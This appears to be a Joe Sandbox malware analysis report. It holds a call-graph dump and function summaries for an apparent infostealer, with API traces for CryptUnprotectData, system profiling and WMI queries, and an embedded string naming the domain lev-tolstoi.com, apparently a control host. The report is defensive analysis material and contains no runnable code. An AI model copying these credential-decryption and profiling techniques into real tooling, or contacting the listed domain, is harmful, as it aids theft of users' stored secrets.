15251->15256 15252 72c38b60 ExitProcess 15253 72c41c4e 15252->15253 15257 72c457c0 15253->15257 15256->15252 15256->15255 15258 72c457e0 15257->15258 15258->15258 15259 72c71320 LdrInitializeThunk 15258->15259 15260 72c458ed 15259->15260 15261 72c4590f 15260->15261 15262 72c45cad 15260->15262 15263 72c71650 LdrInitializeThunk 15260->15263 15266 72c45ae8 15260->15266 15270 72c45b92 15260->15270 15274 72c4594e 15260->15274 15261->15262 15264 72c71720 LdrInitializeThunk 15261->15264 15261->15266 15261->15270 15261->15274 15267 72c71650 LdrInitializeThunk 15262->15267 15262->15274 15275 72c45cf7 15262->15275 15263->15261 15265 72c4593f 15264->15265 15265->15262 15265->15266 15265->15270 15265->15274 15266->15274 15338 72c6e110 LdrInitializeThunk 15266->15338 15267->15275 15269 72c466be 15290 72c46792 15269->15290 15339 72c6e110 LdrInitializeThunk 15269->15339 15271 72c71320 LdrInitializeThunk 15270->15271 15271->15262 15272 72c71720 LdrInitializeThunk 15272->15275 15273 72c460df 15273->15255 15286 72c46319 15273->15286 15291 72c4634d 15273->15291 15294 72c4c8a0 15273->15294 15274->15255 15274->15274 15275->15272 15275->15273 15275->15275 15281 72c460b5 CryptUnprotectData 15275->15281 15293 72c6e110 LdrInitializeThunk 15275->15293 15280 72c46f0e 15281->15273 15281->15275 15282 72c4c8a0 3 API calls 15282->15274 15283 72c465bd 15283->15282 15306 72c49ad0 15286->15306 15287 72c4731b 15289 72c468eb 15289->15280 15289->15289 15341 72c6e110 LdrInitializeThunk 15289->15341 15290->15289 15340 72c6e110 LdrInitializeThunk 15290->15340 15291->15274 15291->15283 15292 72c714b0 LdrInitializeThunk 15291->15292 15292->15291 15293->15275 15295 72c4c8ca 15294->15295 15342 72c44ca0 15295->15342 15297 72c4c9cb 15298 72c44ca0 3 API calls 15297->15298 15299 72c4ca59 15298->15299 15300 72c44ca0 3 API calls 15299->15300 15301 72c4cadf 15300->15301 15302 72c44ca0 3 API calls 15301->15302 15303 72c4cbf9 15302->15303 15304 72c44ca0 3 API calls 15303->15304 15305 72c4cc62 15304->15305 15305->15286 15307 72c49b00 15306->15307 15311 72c49b78 15307->15311 15416 72c6e110 LdrInitializeThunk 15307->15416 15309 72c49cbe 15314 72c49d6e 15309->15314 15331 72c46338 15309->15331 15418 72c6e110 LdrInitializeThunk 15309->15418 15311->15309 15417 72c6e110 LdrInitializeThunk 15311->15417 15313 72c49eef 15315 72c6c570 RtlFreeHeap 15313->15315 15314->15313 15322 72c49f48 15314->15322 15419 72c6e110 LdrInitializeThunk 15314->15419 15315->15322 15317 72c4a2a7 FreeLibrary 15321 72c4a157 15317->15321 15319 72c4a152 15319->15317 15320 72c4a216 FreeLibrary 15319->15320 15324 72c4a230 15320->15324 15321->15331 15421 72c6e110 LdrInitializeThunk 15321->15421 15322->15317 15322->15319 15322->15321 15322->15331 15420 72c6e110 LdrInitializeThunk 15322->15420 15326 72c4a2a2 15324->15326 15422 72c6e110 LdrInitializeThunk 15324->15422 15329 72c4a3fe 15326->15329 15423 72c6e110 LdrInitializeThunk 15326->15423 15328 72c4ac58 15330 72c6c570 RtlFreeHeap 15328->15330 15329->15331 15337 72c4a4de 15329->15337 15424 72c6e110 LdrInitializeThunk 15329->15424 15330->15331 15331->15269 15331->15291 15333 72c6c830 LdrInitializeThunk 15333->15337 15334 72c6c990 LdrInitializeThunk 15334->15337 15335 72c6e110 LdrInitializeThunk 15335->15337 15336 72c6c570 RtlFreeHeap 15336->15337 15337->15328 15337->15333 15337->15334 15337->15335 15337->15336 15338->15269 15339->15290 15340->15289 15341->15287 15343 72c44cc0 15342->15343 15344 72c71320 LdrInitializeThunk 15343->15344 15345 72c44e14 15344->15345 15346 72c71320 LdrInitializeThunk 15345->15346 15371 72c45021 15346->15371 15347 72c4509e 15348 72c450e9 15347->15348 15349 72c4522e 15347->15349 15381 72c45170 15347->15381 15351 72c6c570 RtlFreeHeap 15348->15351 15349->15297 15354 72c450ef 15351->15354 15352 72c45551 15401 72c6e110 LdrInitializeThunk 15352->15401 15355 72c45152 15354->15355 15410 72c6e110 LdrInitializeThunk 15354->15410 15356 72c45625 15355->15356 15357 72c456a1 15355->15357 15358 72c4579e 15355->15358 15359 72c456d2 15355->15359 15360 72c455d3 15355->15360 15361 72c457b0 15355->15361 15362 72c4563c 15355->15362 15366 72c6c5a0 2 API calls 15355->15366 15378 72c455ff 15355->15378 15380 72c45696 15355->15380 15370 72c71320 LdrInitializeThunk 15356->15370 15357->15359 15357->15362 15364 72c71650 LdrInitializeThunk 15357->15364 15357->15378 15357->15380 15367 72c6c990 LdrInitializeThunk 15358->15367 15365 72c71650 LdrInitializeThunk 15359->15365 15360->15356 15360->15357 15360->15358 15360->15359 15360->15361 15360->15362 15360->15378 15360->15380 15402 72c6ca40 15360->15402 15368 72c6c990 LdrInitializeThunk 15361->15368 15363 72c71720 LdrInitializeThunk 15362->15363 15362->15378 15362->15380 15363->15362 15364->15359 15365->15362 15373 72c455c7 15366->15373 15367->15361 15374 72c457b9 15368->15374 15370->15362 15371->15347 15371->15348 15371->15381 15383 72c6e110 LdrInitializeThunk 15371->15383 15372 72c6e110 LdrInitializeThunk 15372->15381 15379 72c6c830 LdrInitializeThunk 15373->15379 15374->15374 15378->15297 15379->15360 15380->15378 15411 72c6e110 LdrInitializeThunk 15380->15411 15381->15349 15381->15352 15381->15372 15384 72c69d30 15381->15384 15383->15347 15386 72c69d40 15384->15386 15385 72c6e0a0 2 API calls 15385->15386 15386->15385 15389 72c69e53 15386->15389 15412 72c6e110 LdrInitializeThunk 15386->15412 15387 72c6a25b 15390 72c6c570 RtlFreeHeap 15387->15390 15389->15387 15391 72c6c830 LdrInitializeThunk 15389->15391 15392 72c6a274 15390->15392 15398 72c69e9a 15391->15398 15392->15381 15393 72c6a25f 15394 72c6c990 LdrInitializeThunk 15393->15394 15394->15387 15395 72c6e0a0 2 API calls 15395->15398 15396 72c6e110 LdrInitializeThunk 15396->15398 15397 72c6c570 RtlFreeHeap 15397->15398 15398->15393 15398->15395 15398->15396 15398->15397 15399 72c6a281 15398->15399 15400 72c6c570 RtlFreeHeap 15399->15400 15400->15393 15401->15354 15403 72c6ca5a 15402->15403 15409 72c455f1 15402->15409 15404 72c6cae2 15403->15404 15403->15409 15413 72c6e110 LdrInitializeThunk 15403->15413 15404->15404 15406 72c6cc4e 15404->15406 15414 72c6e110 LdrInitializeThunk 15404->15414 15406->15409 15415 72c6e110 LdrInitializeThunk 15406->15415 15409->15356 15409->15357 15409->15358 15409->15359 15409->15361 15409->15362 15409->15378 15409->15380 15410->15355 15411->15358 15412->15386 15413->15404 15414->15406 15415->15409 15416->15311 15417->15309 15418->15314 15419->15313 15420->15319 15421->15331 15422->15326 15423->15329 15424->15337 14903 72c6e760 14905 72c6e780 14903->14905 14904 72c6e7be 14905->14904 14907 72c6e110 LdrInitializeThunk 14905->14907 14907->14904 15425 72c68ea0 15426 72c68ec5 15425->15426 15429 72c68fc9 15426->15429 15434 72c6e110 LdrInitializeThunk 15426->15434 15427 72c69210 15429->15427 15431 72c690e1 15429->15431 15433 72c6e110 LdrInitializeThunk 15429->15433 15431->15427 15435 72c6e110 LdrInitializeThunk 15431->15435 15433->15429 15434->15426 15435->15431 15436 72c6c5a0 15437 72c6c5d0 15436->15437 15439 72c6c62e 15437->15439 15444 72c6e110 LdrInitializeThunk 15437->15444 15439->15439 15441 72c6c749 15439->15441 15442 72c6c801 15439->15442 15445 72c6e110 LdrInitializeThunk 15439->15445 15440 72c6c570 RtlFreeHeap 15440->15442 15441->15440 15441->15441 15444->15439 15445->15441 15446 72c70d20 15447 72c70d2f 15446->15447 15450 72c70e98 15447->15450 15454 72c6e110 LdrInitializeThunk 15447->15454 15448 72c7114b 15450->15448 15453 72c7108e 15450->15453 15455 72c6e110 LdrInitializeThunk 15450->15455 15451 72c6c570 RtlFreeHeap 15451->15448 15453->15451 15454->15450 15455->15453 14908 72c3a369 14909 72c3a430 14908->14909 14909->14909 14912 72c3b100 14909->14912 14911 72c3a479 14913 72c3b190 14912->14913 14915 72c3b1b5 14913->14915 14916 72c6e0a0 14913->14916 14915->14911 14917 72c6e0c0 14916->14917 14918 72c6e0d4 14916->14918 14919 72c6e0f3 14916->14919 14922 72c6e0e8 14916->14922 14917->14918 14917->14919 14921 72c6e0d9 RtlReAllocateHeap 14918->14921 14923 72c6c570 14919->14923 14921->14922 14922->14913 14924 72c6c585 14923->14924 14925 72c6c583 14923->14925 14926 72c6c58a RtlFreeHeap 14924->14926 14925->14922 14926->14922 15456 72c60b2b CoSetProxyBlanket 14928 72c5c9eb 14931 72c5c8e2 14928->14931 14929 72c5cab5 14931->14929 14932 72c6e110 LdrInitializeThunk 14931->14932 14932->14931 15457 72c6e3a9 15458 72c6e3b2 GetForegroundWindow 15457->15458 15459 72c6e3c9 15458->15459 15460 72c6ea29 15461 72c6ea50 15460->15461 15463 72c6ea8e 15461->15463 15467 72c6e110 LdrInitializeThunk 15461->15467 15466 72c6e110 LdrInitializeThunk 15463->15466 15465 72c6eb59 15466->15465 15467->15463 14933 72c3de73 14934 72c3ded0 14933->14934 14934->14934 14935 72c3df1e 14934->14935 14937 72c6e110 LdrInitializeThunk 14934->14937 14937->14935 14938 72c5dc76 14939 72c5dc7c 14938->14939 14939->14939 14940 72c5dcf0 GetComputerNameExA 14939->14940 14941 72c3ec77 CoInitializeSecurity CoInitializeSecurity 14942 72c518f0 14943 72c518fe 14942->14943 14946 72c51950 14942->14946 14948 72c51a10 14943->14948 14949 72c51a20 14948->14949 14949->14949 14952 72c714b0 14949->14952 14951 72c51b0f 14954 72c714d0 14952->14954 14953 72c715fe 14953->14951 14954->14953 14956 72c6e110 LdrInitializeThunk 14954->14956 14956->14953 14957 72c3cc7a 15010 72c38b60 14957->15010 14959 72c3cc86 14960 72c38b60 ExitProcess 14959->14960 14961 72c3cca2 14960->14961 15015 72c542d0 14961->15015 14963 72c3cca8 14964 72c38b60 ExitProcess 14963->14964 14965 72c3ccbe 14964->14965 15026 72c54560 14965->15026 14967 72c3ccc4 14968 72c38b60 ExitProcess 14967->14968 14969 72c3ccd7 14968->14969 15037 72c57440 14969->15037 14973 72c3ccef 15062 72c59e80 14973->15062 14975 72c3ccf8 14976 72c38b60 ExitProcess 14975->14976 14977 72c3cd0e 14976->14977 15066 72c590d0 14977->15066 14979 72c3cd14 14980 72c38b60 ExitProcess 14979->14980 14981 72c3cd2a 14980->14981 14982 72c63e30 6 API calls 14981->14982 14983 72c3cd39 14982->14983 14984 72c38b60 ExitProcess 14983->14984 14985 72c3cd4c 14984->14985 14986 72c38b60 ExitProcess 14985->14986 14987 72c3cd68 14986->14987 14988 72c542d0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14987->14988 14989 72c3cd6e 14988->14989 14990 72c38b60 ExitProcess 14989->14990 14991 72c3cd84 14990->14991 14992 72c54560 RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14991->14992 14993 72c3cd8a 14992->14993 14994 72c38b60 ExitProcess 14993->14994 14995 72c3cd9d 14994->14995 14996 72c57440 RtlFreeHeap LdrInitializeThunk 14995->14996 14997 72c3cdac 14996->14997 14998 72c57740 RtlFreeHeap LdrInitializeThunk 14997->14998 14999 72c3cdb5 14998->14999 15000 72c59e80 RtlExpandEnvironmentStrings 14999->15000 15001 72c3cdbe 15000->15001 15002 72c38b60 ExitProcess 15001->15002 15003 72c3cdd4 15002->15003 15004 72c590d0 RtlExpandEnvironmentStrings 15003->15004 15005 72c3cdda 15004->15005 15006 72c38b60 ExitProcess 15005->15006 15007 72c3cdf0 15006->15007 15008 72c63e30 6 API calls 15007->15008 15009 72c3cdff 15008->15009 15070 72c38530 15010->15070 15012 72c38b9d 15013 72c38530 ExitProcess 15012->15013 15014 72c38bec 15012->15014 15013->15012 15014->14959 15016 72c54360 15015->15016 15016->15016 15017 72c54376 RtlExpandEnvironmentStrings 15016->15017 15020 72c543d0 15017->15020 15019 72c546e1 15082 72c70460 15019->15082 15020->15019 15022 72c54431 RtlExpandEnvironmentStrings 15020->15022 15025 72c54450 15020->15025 15074 72c706f0 15020->15074 15022->15019 15022->15020 15022->15025 15025->14963 15025->15025 15027 72c5456e 15026->15027 15028 72c70340 LdrInitializeThunk 15027->15028 15030 72c54408 15028->15030 15029 72c706f0 2 API calls 15029->15030 15030->15029 15031 72c546e1 15030->15031 15034 72c54431 RtlExpandEnvironmentStrings 15030->15034 15036 72c54450 15030->15036 15032 72c70460 2 API calls 15031->15032 15033 72c54712 15032->15033 15035 72c70340 LdrInitializeThunk 15033->15035 15033->15036 15034->15030 15034->15031 15034->15036 15035->15036 15036->14967 15038 72c57460 15037->15038 15041 72c574ae 15038->15041 15099 72c6e110 LdrInitializeThunk 15038->15099 15039 72c3cce6 15045 72c57740 15039->15045 15041->15039 15044 72c5756e 15041->15044 15100 72c6e110 LdrInitializeThunk 15041->15100 15042 72c6c570 RtlFreeHeap 15042->15039 15044->15042 15101 72c57760 15045->15101 15047 72c57754 15047->14973 15050 72c58080 15050->14973 15054 72c71650 LdrInitializeThunk 15050->15054 15051 72c581c2 15051->14973 15057 72c58853 15054->15057 15056 72c5804c 15056->15050 15056->15051 15118 72c71320 15056->15118 15122 72c71650 15056->15122 15126 72c71720 15056->15126 15058 72c71720 LdrInitializeThunk 15057->15058 15059 72c588a1 15057->15059 15061 72c588b5 15057->15061 15058->15059 15059->15061 15132 72c6e110 LdrInitializeThunk 15059->15132 15061->14973 15063 72c59f10 15062->15063 15063->15063 15064 72c59f37 RtlExpandEnvironmentStrings 15063->15064 15065 72c59dd1 15064->15065 15065->14975 15067 72c59110 15066->15067 15067->15067 15068 72c59136 RtlExpandEnvironmentStrings 15067->15068 15069 72c59180 15068->15069 15069->15069 15071 72c38595 15070->15071 15072 72c38542 15070->15072 15071->15072 15073 72c3859c ExitProcess 15071->15073 15072->15012 15073->15072 15075 72c70710 15074->15075 15078 72c7075e 15075->15078 15094 72c6e110 LdrInitializeThunk 15075->15094 15076 72c709d3 15076->15020 15078->15076 15081 72c7084e 15078->15081 15095 72c6e110 LdrInitializeThunk 15078->15095 15079 72c6c570 RtlFreeHeap 15079->15076 15081->15079 15081->15081 15083 72c70480 15082->15083 15086 72c704ce 15083->15086 15096 72c6e110 LdrInitializeThunk 15083->15096 15084 72c54712 15084->15025 15090 72c70340 15084->15090 15086->15084 15089 72c705af 15086->15089 15097 72c6e110 LdrInitializeThunk 15086->15097 15087 72c6c570 RtlFreeHeap 15087->15084 15089->15087 15091 72c70360 15090->15091 15091->15091 15092 72c7042f 15091->15092 15098 72c6e110 LdrInitializeThunk 15091->15098 15092->15025 15094->15078 15095->15081 15096->15086 15097->15089 15098->15092 15099->15041 15100->15044 15102 72c577a0 15101->15102 15102->15102 15133 72c6c5a0 15102->15133 15106 72c5782f 15153 72c6c990 15106->15153 15108 72c57823 15108->15106 15145 72c6cdf0 15108->15145 15111 72c6a2a0 15115 72c6a2d0 15111->15115 15112 72c70340 LdrInitializeThunk 15112->15115 15113 72c706f0 2 API calls 15113->15115 15114 72c6a428 15114->15056 15115->15112 15115->15113 15115->15114 15163 72c70d20 15115->15163 15171 72c6e110 LdrInitializeThunk 15115->15171 15120 72c71340 15118->15120 15119 72c7145e 15119->15056 15120->15119 15174 72c6e110 LdrInitializeThunk 15120->15174 15124 72c71680 15122->15124 15123 72c716ce 15123->15056 15124->15123 15175 72c6e110 LdrInitializeThunk 15124->15175 15127 72c71750 15126->15127 15130 72c717a9 15127->15130 15176 72c6e110 LdrInitializeThunk 15127->15176 15128 72c7184e 15128->15056 15130->15128 15177 72c6e110 LdrInitializeThunk 15130->15177 15132->15061 15134 72c6c5d0 15133->15134 15136 72c6c62e 15134->15136 15157 72c6e110 LdrInitializeThunk 15134->15157 15136->15136 15138 72c6c749 15136->15138 15139 72c57817 15136->15139 15158 72c6e110 LdrInitializeThunk 15136->15158 15137 72c6c570 RtlFreeHeap 15137->15139 15138->15137 15138->15138 15141 72c6c830 15139->15141 15142 72c6c8fe 15141->15142 15143 72c6c841 15141->15143 15142->15108 15143->15142 15159 72c6e110 LdrInitializeThunk 15143->15159 15146 72c6ce40 15145->15146 15152 72c6ce9e 15146->15152 15160 72c6e110 LdrInitializeThunk 15146->15160 15147 72c6d60e 15147->15108 15149 72c6d59a 15149->15147 15161 72c6e110 LdrInitializeThunk 15149->15161 15151 72c6e110 LdrInitializeThunk 15151->15152 15152->15147 15152->15149 15152->15151 15154 72c6c99a 15153->15154 15156 72c57749 15153->15156 15154->15156 15162 72c6e110 LdrInitializeThunk 15154->15162 15156->15047 15156->15111 15157->15136 15158->15138 15159->15142 15160->15152 15161->15147 15162->15156 15164 72c70d2f 15163->15164 15167 72c70e98 15164->15167 15172 72c6e110 LdrInitializeThunk 15164->15172 15165 72c7114b 15165->15115 15167->15165 15170 72c7108e 15167->15170 15173 72c6e110 LdrInitializeThunk 15167->15173 15168 72c6c570 RtlFreeHeap 15168->15165 15170->15168 15171->15115 15172->15167 15173->15170 15174->15119 15175->15123 15176->15130 15177->15128 15468 72c539b9 15469 72c53406 15468->15469 15473 72c5374a 15468->15473 15470 72c53b50 RtlExpandEnvironmentStrings 15472 72c53c50 15470->15472 15472->15469 15474 72c53c9e RtlExpandEnvironmentStrings 15472->15474 15475 72c53f58 15472->15475 15479 72c53ce2 15472->15479 15481 72c53def 15472->15481 15473->15468 15473->15469 15473->15470 15473->15472 15473->15479 15496 72c6e110 LdrInitializeThunk 15473->15496 15474->15469 15474->15475 15474->15479 15474->15481 15475->15469 15475->15475 15483 72c51d00 15475->15483 15478 72c714b0 LdrInitializeThunk 15478->15481 15479->15478 15479->15479 15480 72c53f41 GetLogicalDrives 15482 72c714b0 LdrInitializeThunk 15480->15482 15481->15469 15481->15475 15481->15480 15481->15481 15482->15475 15484 72c71320 LdrInitializeThunk 15483->15484 15488 72c51d43 15484->15488 15485 72c523f5 15485->15469 15487 72c6c570 RtlFreeHeap 15489 72c5239e 15487->15489 15488->15485 15495 72c51de9 15488->15495 15497 72c6e110 LdrInitializeThunk 15488->15497 15489->15485 15499 72c6e110 LdrInitializeThunk 15489->15499 15490 72c52383 15490->15487 15492 72c5245a 15490->15492 15494 72c6c570 RtlFreeHeap 15494->15495 15495->15490 15495->15494 15498 72c6e110 LdrInitializeThunk 15495->15498 15496->15473 15497->15488 15498->15495 15499->15489

                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                  Function 72C52E6D Relevance: 47.0, APIs: 3, Strings: 23, Instructions: 1504COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: %"$+A#C=]=_$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$lev-tolstoi.com$s$wdnf$~SS}$rp
                                                                                                                                                                                                                                                                  • API String ID: 0-796191818
                                                                                                                                                                                                                                                                  • Opcode ID: 688215a99f4b0a2e654ead558b02c19c0b5e7613f83424743a1e0884aafa2051
                                                                                                                                                                                                                                                                  • Instruction ID: 27b35d32d93a68c811ad7c6bf2a3c617b76fa1057ba77d09a51b9bf02c04dbea
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 688215a99f4b0a2e654ead558b02c19c0b5e7613f83424743a1e0884aafa2051
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10B202B2A04341CFD714CF2AC89176BBBB2FB95314F298A6CE4959B391D734D806CB91
                                                                                                                                                                                                                                                                  Function 72C69280 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 653memorycomCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 204 72c69280-72c692a4 205 72c692b0-72c692d7 204->205 205->205 206 72c692d9-72c692ef 205->206 207 72c692f0-72c69322 206->207 207->207 208 72c69324-72c6936a 207->208 209 72c69370-72c6938c 208->209 209->209 210 72c6938e-72c693a7 209->210 212 72c693ad-72c693b6 210->212 213 72c6942a-72c69435 210->213 214 72c693c0-72c693d9 212->214 215 72c69440-72c6947b 213->215 214->214 216 72c693db-72c693ee 214->216 215->215 217 72c6947d-72c694de CoCreateInstance 215->217 218 72c693f0-72c6941e 216->218 219 72c69906-72c69932 call 72c6fe00 GetVolumeInformationW 217->219 220 72c694e4-72c69515 217->220 218->218 222 72c69420-72c69425 218->222 226 72c69934-72c69938 219->226 227 72c6993c-72c6993e 219->227 223 72c69520-72c6954d 220->223 222->213 223->223 224 72c6954f-72c69576 SysAllocString 223->224 230 72c698f5-72c69902 SysFreeString 224->230 231 72c6957c-72c69596 CoSetProxyBlanket 224->231 226->227 229 72c69950-72c69957 227->229 232 72c69970-72c6998f 229->232 233 72c69959-72c69960 229->233 230->219 234 72c6959c-72c695b4 231->234 235 72c698eb-72c698f1 231->235 237 72c69990-72c699b2 232->237 233->232 236 72c69962-72c6996e 233->236 238 72c695c0-72c6961e 234->238 235->230 236->232 237->237 239 72c699b4-72c699ca 237->239 238->238 241 72c69620-72c6969f SysAllocString 238->241 240 72c699d0-72c69a06 239->240 240->240 242 72c69a08-72c69a2e call 72c4e960 240->242 243 72c696a0-72c696ff 241->243 247 72c69a30-72c69a37 242->247 243->243 245 72c69701-72c6972d SysAllocString 243->245 250 72c698d6-72c698e7 SysFreeString * 2 245->250 251 72c69733-72c69755 245->251 247->247 249 72c69a39-72c69a4c 247->249 252 72c69a52-72c69a65 call 72c37fd0 249->252 253 72c69940-72c6994a 249->253 250->235 258 72c698cc-72c698d2 251->258 259 72c6975b-72c6975e 251->259 252->253 253->229 255 72c69a6a-72c69a71 253->255 258->250 259->258 260 72c69764-72c69769 259->260 260->258 261 72c6976f-72c697b7 VariantInit 260->261 262 72c697c0-72c697d4 261->262 262->262 263 72c697d6-72c697e0 262->263 264 72c697e4-72c697e6 263->264 265 72c697ec-72c697f2 264->265 266 72c698bb-72c698c8 VariantClear 264->266 265->266 267 72c697f8-72c69806 265->267 266->258 268 72c6983d 267->268 269 72c69808-72c6980d 267->269 270 72c6983f-72c69877 call 72c37f50 call 72c38e10 268->270 271 72c6981c-72c69820 269->271 282 72c698a7-72c698b7 call 72c37f60 270->282 283 72c69879-72c6988f 270->283 273 72c69822-72c6982b 271->273 274 72c69810 271->274 277 72c69832-72c69836 273->277 278 72c6982d-72c69830 273->278 276 72c69811-72c6981a 274->276 276->270 276->271 277->276 280 72c69838-72c6983b 277->280 278->276 280->276 282->266 283->282 284 72c69891-72c6989e 283->284 284->282 286 72c698a0-72c698a3 284->286 286->282
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(72C7368C,00000000,00000001,72C7367C,00000000), ref: 72C694CF
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00001F7A), ref: 72C69550
                                                                                                                                                                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 72C6958E
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(8DFD93FD), ref: 72C69625
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(4A105420), ref: 72C69706
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 72C69774
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 72C698BC
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32 ref: 72C698DF
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 72C698E5
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 72C698F6
                                                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 72C6992E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                                                  • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                                                  • API String ID: 2573436264-1335595022
                                                                                                                                                                                                                                                                  • Opcode ID: f5ce5c694c8ba861100af443246ae88eafdb033e422f2f5732706555f3869833
                                                                                                                                                                                                                                                                  • Instruction ID: 3c435cad67f5b4446a5f0f0d0909e0aca5ee3e84c9280e78065e6164dd5e4990
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5ce5c694c8ba861100af443246ae88eafdb033e422f2f5732706555f3869833
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74222376A083419BD300CF29C880B6BBBE2EFD5314F148A6CF9959B391D775D946CB82
                                                                                                                                                                                                                                                                  Function 72C457C0 Relevance: 29.7, APIs: 1, Strings: 15, Instructions: 1713COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                                                                  • API String ID: 0-510280711
                                                                                                                                                                                                                                                                  • Opcode ID: e390dcf5c497e26306c88e7be88e81c99a1580868d719d933393d7f892ada6f5
                                                                                                                                                                                                                                                                  • Instruction ID: 73ab45b1a1ef3ee0cd622b12da568f12c3f45a0ed01cb5b62f5416736fe4a8b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e390dcf5c497e26306c88e7be88e81c99a1580868d719d933393d7f892ada6f5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06C204B26082408FD725CF28C8917ABBBE2FFE5314F254A2CD5DA87395DB359805CB42
                                                                                                                                                                                                                                                                  Function 72C41227 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 750COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
